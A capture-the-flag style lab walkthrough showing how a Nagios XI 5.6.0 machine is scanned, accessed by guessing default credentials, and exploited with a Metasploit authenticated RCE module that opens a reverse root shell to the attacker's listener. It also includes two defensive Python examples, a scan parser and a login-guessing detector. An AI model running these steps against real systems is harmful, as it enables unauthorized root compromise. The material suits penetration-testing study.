【OSCP】- Monitoring Lab Walkthrough (Proving Grounds Play)
Contents
- 0. Lab Information
- 1. Information Gathering
- 2. Port 80
- 3. Privilege Escalation
0. Lab Information
Summary
In this lab, we exploit an authenticated remote code execution vulnerability in the Nagios XI monitoring software. The application is misconfigured to run with root privileges, allowing us to escalate immediately to root once the vulnerability is exploited.
Level: Easy
Community Rating: Intermediate
Number of Flags: 1
OS: Linux
Vector Type: Webapp
1. Information Gathering
Start with a fast scan of all ports: rustscan -a 192.168.184.136 -r 1-65535
Then scan the open ports in more detail: nmap -p22,25,80,443,5667 -AO -sV -sT 192.168.184.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-02 18:16 CST
Nmap scan report for bogon (192.168.184.136)
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
| 256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_ 256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after: 2030-09-06T18:28:08
|_http-title: Nagios XI
5667/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (98%), Linux 3.10 - 4.11 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.12 (93%), Linux 3.13 or 4.2 (93%), Linux 3.16 - 4.6 (93%), Linux 3.18 (93%), Linux 3.8 - 3.11 (93%), Linux 4.2 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 172.57 ms bogon (192.168.45.1)
2 172.55 ms bogon (192.168.45.254)
3 174.78 ms bogon (192.168.251.1)
4 172.72 ms bogon (192.168.184.136)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.70 seconds
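As an added example (not part of the original writeup), here is a small Python parser for the normal-format nmap output above. It pulls each port line with its state, service and version, attaches NSE script lines such as http-title to the port they belong to, and lists the open ports nmap could not fingerprint (here 5667) so they are not forgotten during follow-up. The sample input is constructed from the scan output shown above.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the port table of the nmap run above, with the NSE
# lines kept so the parser has script output to attach to a port.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp  open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
5667/tcp open  unknown
Service Info: Host: ubuntu; OS: Linux
"""

# "PORT/PROTO STATE SERVICE [VERSION]" as printed by nmap's normal output
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script output lines: "| name: value" or "|_name: value"
NSE_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)


def parse_nmap_ports(text):
    """Return one PortRecord per port line, attaching NSE lines to the port above them."""
    records = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, (version or "").strip()))
            continue
        n = NSE_LINE.match(line)
        if n and records:
            records[-1].scripts[n.group(1)] = n.group(2).strip()
    return records


def unidentified_ports(records):
    """Open ports nmap could not fingerprint: these need manual follow-up."""
    return [r.port for r in records
            if r.state == "open" and (r.service == "unknown" or not r.version)]


def web_titles(records):
    """Map port -> http-title; the title is what revealed Nagios XI on 80 and 443."""
    return {r.port: r.scripts["http-title"] for r in records if "http-title" in r.scripts}


if __name__ == "__main__":
    recs = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    for r in recs:
        print(r.port, r.proto, r.state, r.service, r.version or "-")
    print("unidentified:", unidentified_ports(recs))
    print("web titles:", web_titles(recs))
```

The parser only understands nmap's normal text output; for anything beyond a quick triage, run nmap with -oX and read the XML instead, since that format is stable across versions.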
2. Port 80
Information gathered about port 80:
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
Open port 80 in the browser: http://192.168.184.136/
Scan the site directories: dirsearch -u 192.168.184.136
Nothing useful turned up.
Check the site fingerprint: whatweb http://192.168.184.136/
The CMS is Nagios XI.
Click the "access nagios xi" button:
There is a login form here. Ordinary weak passwords got nowhere, so I searched for this product's default username and password: the username is nagiosadmin, and the password might be nagiosadmin or nagios, but both were rejected. I then tried common passwords against that username, and nagiosadmin/admin finally logged in.
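Seen from the defender's side, the password guessing above shows up in the web server's access log as a burst of POSTs to the login form from one client. The following Python detector is an added example, not part of the writeup or of Nagios XI: it parses Apache combined-format log lines, counts POSTs to the login path per client inside a sliding five-minute window and reports clients that reach a threshold. The login path /nagiosxi/login.php and the sample log lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: the Nagios XI login form posts to /nagiosxi/login.php. The path is
# not taken from the writeup; adjust it to whatever your access log actually shows.
LOGIN_PATH = "/nagiosxi/login.php"
WINDOW = timedelta(minutes=5)   # sliding window length
THRESHOLD = 5                   # login POSTs per client per window before we alert

# Apache "combined" log format; only the fields we use are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not a real capture): one client hammering the form,
# one client logging in once.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Aug/2025:18:20:01 +0800] "GET /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.10 - - [02/Aug/2025:18:20:05 +0800] "POST /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.10 - - [02/Aug/2025:18:20:09 +0800] "POST /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.20 - - [02/Aug/2025:18:20:11 +0800] "POST /nagiosxi/login.php HTTP/1.1" 302 0
192.0.2.10 - - [02/Aug/2025:18:20:14 +0800] "POST /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.10 - - [02/Aug/2025:18:20:18 +0800] "POST /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.10 - - [02/Aug/2025:18:21:02 +0800] "POST /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.10 - - [02/Aug/2025:18:21:40 +0800] "POST /nagiosxi/login.php HTTP/1.1" 200 2310
192.0.2.10 - - [02/Aug/2025:18:21:41 +0800] "GET /nagiosxi/index.php HTTP/1.1" 200 5120
"""


def login_posts(log_text):
    """Return {client_ip: [timestamps]} for POSTs to the login path; other lines are ignored."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip it, never let it break the detector
        if m["method"] == "POST" and m["path"].split("?", 1)[0] == LOGIN_PATH:
            posts[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    return posts


def max_in_window(times, window):
    """Largest number of events that fall inside any interval of length `window`."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_login_guessing(log_text, window=WINDOW, threshold=THRESHOLD):
    """Clients whose peak login-POST count in one window reaches the threshold."""
    hits = {}
    for ip, times in login_posts(log_text).items():
        peak = max_in_window(times, window)
        if peak >= threshold:
            hits[ip] = peak
    return hits


if __name__ == "__main__":
    for ip, n in detect_login_guessing(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs within {WINDOW}")
```

The detector deliberately counts every POST to the form rather than only failed ones, because the response code a product returns for a failed login varies; on a real deployment, pair this with a lockout or rate limit on the login form and with changing the default account's password, which is the misconfiguration the walkthrough actually exploits.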
The URL starts with /nagiosxi, so rescan the directories from there: dirsearch -u http://192.168.184.136/nagiosxi/
Check each path in turn:
- http://192.168.184.136/nagiosxi/backend/ :
Then visit http://192.168.184.136/nagiosxi/backend/?cmd=getProgramStatus :
Still nothing particularly useful.
In the bottom-left corner the version is shown: Nagios XI 5.6.0.
3. Privilege Escalation
Search directly in MSF: search nagios
Taking the version information and the rank into account, I tried a few modules, and module 10 turned out to be the best fit.
The title of module 10 also says "authenticated", so it needs the username and password we just logged in with.
Use the module: use 10
Show the parameters the module needs: show options
A few required options can be seen:
Set the target IP: set RHOSTS 192.168.229.136
Set the password: set PASSWORD admin
Set the listener IP, i.e. our own machine's IP: set LHOST 192.168.45.220
Set the IP the server binds to, also our own machine's IP: set SRVHOST 192.168.45.220
Run it: exploit
Once the session is established, run: shell
Check the current user: id
We are root straight away.
Got the flag.